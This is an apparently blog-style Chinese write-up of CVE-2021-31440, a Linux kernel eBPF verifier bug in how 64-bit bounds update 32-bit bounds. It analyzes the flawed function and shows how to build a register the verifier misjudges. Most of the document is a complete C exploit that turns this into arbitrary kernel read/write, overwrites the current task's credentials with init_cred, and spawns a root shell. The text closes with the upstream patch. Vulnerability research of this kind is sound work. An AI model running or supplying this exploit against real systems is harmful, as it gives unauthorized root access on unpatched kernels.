文章目录
- 前言
- 漏洞分析
- 构造 vuln reg
- 漏洞利用
- 漏洞修复
- 参考
前言
影响版本:Linux 5.7 ~ 5.11.20 8.8
编译选项:CONFIG_BPF_SYSCALL
,config
所有带 BPF
字样的编译选项。General setup —> Choose SLAB allocator (SLUB (Unqueued Allocator)) —> SLAB
。CONFIG_E1000
和 CONFIG_E1000E
,变更为 =y
。
漏洞概述:verifier
检查条件跳转时利用 __reg_combine_64_into_32
更新 32 位边界错误
测试环境:测试环境 linux-5.11.0
漏洞分析
漏洞本质发生在 __reg_combine_64_into_32
函数中:
static void __reg_combine_64_into_32(struct bpf_reg_state *reg)
{__mark_reg32_unbounded(reg);if (__reg64_bound_s32(reg->smin_value) && __reg64_bound_s32(reg->smax_value)) { [1]reg->s32_min_value = (s32)reg->smin_value;reg->s32_max_value = (s32)reg->smax_value;}if (__reg64_bound_u32(reg->umin_value)) // reg->umin_value = 1 [2]reg->u32_min_value = (u32)reg->umin_value; // reg->u32_min_value = 1if (__reg64_bound_u32(reg->umax_value)) // reg->umax_value = 0x1_0000_0000 [3]reg->u32_max_value = (u32)reg->umax_value; // reg->u32_max_value = U32_MAX__reg_deduce_bounds(reg);__reg_bound_offset(reg);__update_reg_bounds(reg);
}
该函数会利用寄存器的 64 位边界值去更新 32 位边界值。在 [1]
处,当 smin_value
和 smax_value
都在 32 位带符号范围内时,则更新 32 位带符号边界,这是不存在问题的。但是对于无符号的判断则是分为两步 [2] [3]
,即只要 umin_value
和 umax_value
有一个在 32 为无符号范围内时,则更新对于的 32 位无符号范围。但是这里是存在逻辑错误的,因为 64 位的最大值和最小值并不能完全确定 32 位的最大值最小值,比如上述注释中:当 umin_value = 1
时,则会更新 u32_min_value = 1
,而 umax_value = 0x1_0000_0000
,其不在 32 位无符号范围内,所以不会更新 u32_max_value
。那么问题就来了,我们的真实值是可以为 0x1_0000_0000
,所以这里 u32_min_value
应该是等于 0,而不是等于 1 的。
构造 vuln reg
1、首先构造一个运行时确定为 0x1_0000_0000
,但是 verifier
认定为 unknown
的寄存器 R6
,一般都是通过从 map
中加载数据来构造的。这里笔者从 ZDI
中学到了利用两次 BPF_NEG
去使得 verifier
失去对 R6
的范围跟踪:
BPF_MOV64_IMM(BPF_REG_6, 1), // r6 = 1
BPF_ALU64_IMM(BPF_LSH, BPF_REG_6, 32), // r6 = 0x1_0000_0000
BPF_ALU64_IMM(BPF_NEG, BPF_REG_6, 0), // r6 = ~r6
BPF_ALU64_IMM(BPF_NEG, BPF_REG_6, 0), // r6 = ~r6
2、然后利用 BPF_JGE
修改 R6.umin_value = 1
:
BPF_JMP_IMM(BPF_JGE, BPF_REG_6, 1, 1), // set r6.umin_value = 1
然后会经过 __reg_combine_64_into_32
处理,这时会更新 R6.u32_min_value = R6.umin_value = 1
。
3、然后利用 BPF_JLE
修改 R6.u32_max_value = 1
:
BPF_JMP32_IMM(BPF_JLE, BPF_REG_6, 1, 1), // set r6.u32_max_value = 1
所以这里 R6.u32_min_value = R6.u32_max_value = 1
了,然后会执行如下语句:
......
if (is_jmp32) {false_reg->var_off = tnum_or(tnum_clear_subreg(false_64off),tnum_subreg(false_32off));true_reg->var_off = tnum_or(tnum_clear_subreg(true_64off),tnum_subreg(true_32off));__reg_combine_32_into_64(false_reg);__reg_combine_32_into_64(true_reg);} else {false_reg->var_off = false_64off;true_reg->var_off = true_64off;__reg_combine_64_into_32(false_reg);__reg_combine_64_into_32(true_reg);}
......
这里是 JMP32
,所以会走 if
分支,这里我们主要关注:__reg_combine_32_into_64(true_reg);
:
static void __reg_combine_32_into_64(struct bpf_reg_state *reg)
{/* special case when 64-bit register has upper 32-bit register* zeroed. Typically happens after zext or <<32, >>32 sequence* allowing us to use 32-bit bounds directly,*/if (tnum_equals_const(tnum_clear_subreg(reg->var_off), 0)) {__reg_assign_32_into_64(reg);} else {__mark_reg64_unbounded(reg);__update_reg_bounds(reg);}__reg_deduce_bounds(reg);__reg_bound_offset(reg);__update_reg_bounds(reg);
}
关于最后的三个函数,相信读者已经比较熟悉了,在之前的 ebpf
详细分析过,这里就不细说了,当然你得知道如果 s32_min_value = s32_max_value = u32_max_value = u32_min_value = 1
,则最后 reg.var_off
的低 32 位会被确定为 1。
然后这里 R6
的高 32 位经过两次 NEG
是不确定的,所以会走 else
分支,调用 __update_reg_bounds
更新寄存器范围边界:
static void __update_reg32_bounds(struct bpf_reg_state *reg)
{struct tnum var32_off = tnum_subreg(reg->var_off);/* min signed is max(sign bit) | min(other bits) */reg->s32_min_value = max_t(s32, reg->s32_min_value,var32_off.value | (var32_off.mask & S32_MIN));/* max signed is min(sign bit) | max(other bits) */reg->s32_max_value = min_t(s32, reg->s32_max_value,var32_off.value | (var32_off.mask & S32_MAX));reg->u32_min_value = max_t(u32, reg->u32_min_value, (u32)var32_off.value);reg->u32_max_value = min(reg->u32_max_value,(u32)(var32_off.value | var32_off.mask));
}
我们知道 R6.u32_min_value = R6.u32_max_value = 1
,所以这里会将 R6.s32_min_value/s32_max_value
更新为 1,所以最后会将 R6
的低 32 位确认为 1,但是这是存在问题的,因为我们知道 R6
的值在运行时为 0x1_0000_0000
,所以其低 32 位应当为 0。所以这里就构造了一个低 32 位验证阶段为 1
,运行是为 0
的寄存器 R6
了。
4、然后将 R6+1
即构造了一个低 32 位验证阶段为 2
,运行时为低32为 1
的寄存器 R6
,然后在 R6 AND 1
,即构造了一个验证阶段为 0
,运行时为 1
的寄存器 R6
了。
BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, 1),
BPF_ALU64_IMM(BPF_AND, BPF_REG_6, 1),
漏洞利用
漏洞利用比较简单,这里笔者选择的是利用 bpf_skb_load_bytes
构造任意地址读写,具体可以参考我之前的文章。
exp
如下:
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <ctype.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <linux/bpf.h>
#include "bpf_insn.h"void err_exit(char *msg)
{printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);sleep(2);exit(EXIT_FAILURE);
}void info(char *msg)
{printf("\033[35m\033[1m[+] %s\n\033[0m", msg);
}void hexx(char *msg, size_t value)
{printf("\033[32m\033[1m[+] %s: \033[0m%#lx\n", msg, value);
}void binary_dump(char *desc, void *addr, int len) {uint64_t *buf64 = (uint64_t *) addr;uint8_t *buf8 = (uint8_t *) addr;if (desc != NULL) {printf("\033[33m[*] %s:\n\033[0m", desc);}for (int i = 0; i < len / 8; i += 4) {printf(" %04x", i * 8);for (int j = 0; j < 4; j++) {i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf(" ");}printf(" ");for (int j = 0; j < 32 && j + i * 8 < len; j++) {printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');}puts("");}
}/* root checker and shell poper */
void get_root_shell(void)
{if(getuid()) {puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");sleep(2);exit(EXIT_FAILURE);}puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");puts("\033[34m\033[1m[*] Execve root shell now...\033[0m");system("/bin/sh");/* to exit the process normally, instead of segmentation fault */exit(EXIT_SUCCESS);
}/* bind the process to specific core */
void bind_core(int core)
{cpu_set_t cpu_set;CPU_ZERO(&cpu_set);CPU_SET(core, &cpu_set);sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}static inline int bpf(int cmd, union bpf_attr *attr)
{return syscall(__NR_bpf, cmd, attr, sizeof(*attr));
}static __always_inline int
bpf_map_create(unsigned int map_type, unsigned int key_size,unsigned int value_size, unsigned int max_entries)
{union bpf_attr attr = {.map_type = map_type,.key_size = key_size,.value_size = value_size,.max_entries = max_entries,};return bpf(BPF_MAP_CREATE, &attr);
}static __always_inline int
bpf_map_lookup_elem(int map_fd, const void* key, void* value)
{union bpf_attr attr = {.map_fd = map_fd,.key = (uint64_t)key,.value = (uint64_t)value,};return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}static __always_inline int
bpf_map_update_elem(int map_fd, const void* key, const void* value, uint64_t flags)
{union bpf_attr attr = {.map_fd = map_fd,.key = (uint64_t)key,.value = (uint64_t)value,.flags = flags,};return bpf(BPF_MAP_UPDATE_ELEM, &attr);
}static __always_inline int
bpf_map_delete_elem(int map_fd, const void* key)
{union bpf_attr attr = {.map_fd = map_fd,.key = (uint64_t)key,};return bpf(BPF_MAP_DELETE_ELEM, &attr);
}static __always_inline int
bpf_map_get_next_key(int map_fd, const void* key, void* next_key)
{union bpf_attr attr = {.map_fd = map_fd,.key = (uint64_t)key,.next_key = (uint64_t)next_key,};return bpf(BPF_MAP_GET_NEXT_KEY, &attr);
}static __always_inline uint32_t
bpf_map_get_info_by_fd(int map_fd)
{struct bpf_map_info info;union bpf_attr attr = {.info.bpf_fd = map_fd,.info.info_len = sizeof(info),.info.info = (uint64_t)&info,};bpf(BPF_OBJ_GET_INFO_BY_FD, &attr);return info.btf_id;
}int sockets[2];
int map_fd1;
int map_fd2;
int prog_fd;
uint32_t key;
uint64_t* value1;
uint64_t* value2;
char trigger_buf[0x2000];
uint64_t array_map_ops = 0xffffffff82b0cd40;
uint64_t init_cred = 0xffffffff8398fa20;
uint64_t init_task = 0xffffffff83824a80;
uint64_t init_nsproxy = 0xffffffff8398e740;
uint64_t map_addr = -1;
uint64_t koffset = -1;
uint64_t kbase = -1;
uint64_t tag = 0x6159617a6f616958;
uint64_t current_task;struct bpf_insn prog[] = {BPF_MOV64_REG(BPF_REG_7, BPF_REG_1), // r7 = ctxBPF_LD_MAP_FD(BPF_REG_1, 3), // r1 = [map_fd1]BPF_MOV64_IMM(BPF_REG_6, 0), // r6 = 0BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_6, -8), // *(fp -8) = 0BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), // r2 = fpBPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8), // r2 = fp - 8BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), // args: r1 = bpf_map1 ptr, r2 = fp - 8BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), // if r0 <= r0 goto pc+1 rightBPF_EXIT_INSN(), // exitBPF_MOV64_REG(BPF_REG_9, BPF_REG_0), // r9 = value1 ptrBPF_LD_MAP_FD(BPF_REG_1, 4), // r1 = [map_fd2]BPF_MOV64_IMM(BPF_REG_5, 0), // r5 = 0BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_5, -8), // *(fp -8) = 0BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), // r2 = fpBPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8), // r2 = fp - 8BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), // args: r1 = bpf_map2 ptr, r2 = fp - 8BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), // if r0 <= r0 goto pc+1 rightBPF_EXIT_INSN(), // exitBPF_MOV64_REG(BPF_REG_8, BPF_REG_0), // r8 = value2 ptrBPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_9, -8), // *(fp -8) = value1 ptrBPF_MOV64_IMM(BPF_REG_6, 1), // r6 = 1BPF_ALU64_IMM(BPF_LSH, BPF_REG_6, 32), // r6 = 0x1_0000_0000BPF_ALU64_IMM(BPF_NEG, BPF_REG_6, 0), // r6 = ~r6BPF_ALU64_IMM(BPF_NEG, BPF_REG_6, 0), // r6 = ~r6BPF_MOV64_IMM(BPF_REG_0, 0), // r0 = 0BPF_JMP_IMM(BPF_JGE, BPF_REG_6, 1, 1), // set r6.umin_value = 1BPF_EXIT_INSN(), // exit()BPF_JMP32_IMM(BPF_JLE, BPF_REG_6, 1, 1), // set r6.u32_max_value = 1BPF_EXIT_INSN(), // exit()BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, 1),BPF_ALU64_IMM(BPF_AND, BPF_REG_6, 1),BPF_LDX_MEM(BPF_DW, BPF_REG_5, BPF_REG_8, 0), // r5 = value2[0] = lenBPF_JMP_IMM(BPF_JNE, BPF_REG_5, 0xdead, 2), // leak map_addrBPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 2), // r6 = 2 [verifier 0]BPF_JMP_IMM(BPF_JEQ, BPF_REG_5, 0xdead, 1), // jmpBPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 8), // r6 = 8 [verifier 0]BPF_MOV64_REG(BPF_REG_1, BPF_REG_7), // r1 = ctxBPF_MOV64_IMM(BPF_REG_2, 0), // r2 = 0BPF_MOV64_REG(BPF_REG_3, BPF_REG_10), // r3 = fpBPF_ALU64_IMM(BPF_ADD, BPF_REG_3, -16), // r3 = fp -8BPF_MOV64_IMM(BPF_REG_4, 8), // r4 = 8BPF_ALU64_REG(BPF_ADD, BPF_REG_4, BPF_REG_6), // r4 = 10 [verifier 8]BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_skb_load_bytes), // args: r1 = ctx, r2 = 0, r3 = fp -8, r4 = 10 [verifier 8]BPF_LDX_MEM(BPF_DW, BPF_REG_9, BPF_REG_10, -8), // r9 = value1 ptrBPF_LDX_MEM(BPF_DW, BPF_REG_4, BPF_REG_8, 0), // r5 = value2[0] = lenBPF_JMP_IMM(BPF_JEQ, BPF_REG_4, 0xdead, 4), // jmpBPF_JMP_IMM(BPF_JEQ, BPF_REG_4, 0xbeef, 3), // jmpBPF_LDX_MEM(BPF_DW, BPF_REG_5, BPF_REG_8, 8), // r5 = value2[1]BPF_STX_MEM(BPF_DW, BPF_REG_9, BPF_REG_5, 0), // value1[0] = value2[0]BPF_JMP_IMM(BPF_JEQ, BPF_REG_4, 0xdeef, 2),BPF_LDX_MEM(BPF_DW, BPF_REG_5, BPF_REG_9, 0), // r5 = value1[0]BPF_STX_MEM(BPF_DW, BPF_REG_8, BPF_REG_5, 0), // value2[0] = value1[0]BPF_MOV64_IMM(BPF_REG_0, 0), // r0 = 0BPF_EXIT_INSN(), // exit()
};#define BPF_LOG_SZ 0x20000
char bpf_log_buf[BPF_LOG_SZ] = { '\0' };union bpf_attr attr = {.prog_type = BPF_PROG_TYPE_SOCKET_FILTER,.insns = (uint64_t) &prog,.insn_cnt = sizeof(prog) / sizeof(prog[0]),.license = (uint64_t) "GPL",.log_level = 2,.log_buf = (uint64_t) bpf_log_buf,.log_size = BPF_LOG_SZ,
};void init() {setbuf(stdin, NULL);setbuf(stdout, NULL);setbuf(stderr, NULL);
}void trigger() {write(sockets[0], trigger_buf, 0x100);
}void prep() {value1 = (uint64_t*)calloc(0x2000, 1);value2 = (uint64_t*)calloc(0x2000, 1);prctl(PR_SET_NAME, "XiaozaYa");map_fd1 = bpf_map_create(BPF_MAP_TYPE_ARRAY, sizeof(int), 0x2000, 1);if (map_fd1 < 0) perror("BPF_MAP_CREATE"), err_exit("BPF_MAP_CREATE");map_fd2 = bpf_map_create(BPF_MAP_TYPE_ARRAY, sizeof(int), 0x2000, 1);if (map_fd2 < 0) perror("BPF_MAP_CREATE"), err_exit("BPF_MAP_CREATE");prog_fd = bpf(BPF_PROG_LOAD, &attr);if (prog_fd < 0) puts(bpf_log_buf), perror("BPF_PROG_LOAD"), err_exit("BPF_PROG_LOAD");if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets) < 0)perror("socketpair()"), err_exit("socketpair()");if (setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd)) < 0)perror("socketpair SO_ATTACH_BPF"), err_exit("socketpair()");
// puts(bpf_log_buf);
}void pwn() {uint64_t buf[0x2000/8] = { 0 };memset(trigger_buf, 'A', sizeof(trigger_buf));trigger_buf[8] = '\xc0';value2[0] = 0xdead;bpf_map_update_elem(map_fd1, &key, value1, BPF_ANY);bpf_map_update_elem(map_fd2, &key, value2, BPF_ANY);for (int i = 0; i < 15; i++) {value2[0] = 0xdead;bpf_map_update_elem(map_fd2, &key, value2, BPF_ANY);trigger_buf[8+1] = i*0x10;trigger();memset(buf, 0, sizeof(buf));bpf_map_lookup_elem(map_fd2, &key, buf);uint64_t data = *(uint64_t*)buf;if (map_addr == -1 && (data&0xffff000000000fff) == 0xffff0000000000c0)map_addr = data - 0xc0;printf("[---dump----] %-016llx\n", data);}if (map_addr == -1)err_exit("FAILED to leak map_addr");hexx("map_addr", map_addr);value2[0] = 0xdead;bpf_map_update_elem(map_fd2, &key, value2, BPF_ANY);trigger_buf[8] = '\x00';trigger_buf[8+1] = (char)((map_addr >> 8)&0xff);trigger();memset(buf, 0, sizeof(buf));bpf_map_lookup_elem(map_fd2, &key, buf);binary_dump("LEAK DATA", buf, 0x20);koffset = *(uint64_t*)buf - array_map_ops;init_cred += koffset;init_task += koffset;init_nsproxy += koffset;hexx("koffset", koffset);puts("======= searching current task_struct =======");current_task = init_task;for (;;) {value2[0] = 0xbeef;bpf_map_update_elem(map_fd2, &key, value2, BPF_ANY);*(uint64_t*)(trigger_buf+8) = current_task+0x820;trigger();memset(buf, 0, sizeof(buf));bpf_map_lookup_elem(map_fd2, &key, buf);current_task = buf[0] - 0x818;value2[0] = 0xbeef;bpf_map_update_elem(map_fd2, &key, value2, BPF_ANY);*(uint64_t*)(trigger_buf+8) = current_task+0xae8;trigger();memset(buf, 0, sizeof(buf));bpf_map_lookup_elem(map_fd2, &key, buf);if (buf[0] == tag) {hexx("Hit current_task", current_task);break;}hexx("current_task", current_task);}puts("======= replace cred/real_cred wiht init_cred =======");value2[0] = 0xdeef;value2[1] = init_cred;bpf_map_update_elem(map_fd2, &key, value2, BPF_ANY);*(uint64_t*)(trigger_buf+8) = current_task+0xad8;trigger();value2[1] = init_cred;bpf_map_update_elem(map_fd2, &key, value2, BPF_ANY);*(uint64_t*)(trigger_buf+8) = current_task+0xad0;trigger();value2[1] = init_nsproxy;bpf_map_update_elem(map_fd2, &key, value2, BPF_ANY);*(uint64_t*)(trigger_buf+8) = current_task+0xb40;trigger();}int main(int argc, char** argv, char** envp)
{init();prep();pwn();get_root_shell();puts("EXP NERVER END!");return 0;
}
效果如下:
漏洞修复
patch
如下:
diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index 637462e9b6ee9..9145f88b2a0a5 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -1398,9 +1398,7 @@ static bool __reg64_bound_s32(s64 a)static bool __reg64_bound_u32(u64 a){
- if (a > U32_MIN && a < U32_MAX)
- return true;
- return false;
+ return a > U32_MIN && a < U32_MAX;}static void __reg_combine_64_into_32(struct bpf_reg_state *reg)
@@ -1411,10 +1409,10 @@ static void __reg_combine_64_into_32(struct bpf_reg_state *reg)reg->s32_min_value = (s32)reg->smin_value;reg->s32_max_value = (s32)reg->smax_value;}
- if (__reg64_bound_u32(reg->umin_value))
+ if (__reg64_bound_u32(reg->umin_value) && __reg64_bound_u32(reg->umax_value)) {reg->u32_min_value = (u32)reg->umin_value;
- if (__reg64_bound_u32(reg->umax_value))reg->u32_max_value = (u32)reg->umax_value;
+ }
漏洞修复比较简单,就是跟带符号边界更新一样,只有当 umin_value/umax_value
同时在 32 位无符号范围内时,才更新 32 位范围。
参考
CVE-2021-31440: AN INCORRECT BOUNDS CALCULATION IN THE LINUX KERNEL EBPF VERIFIER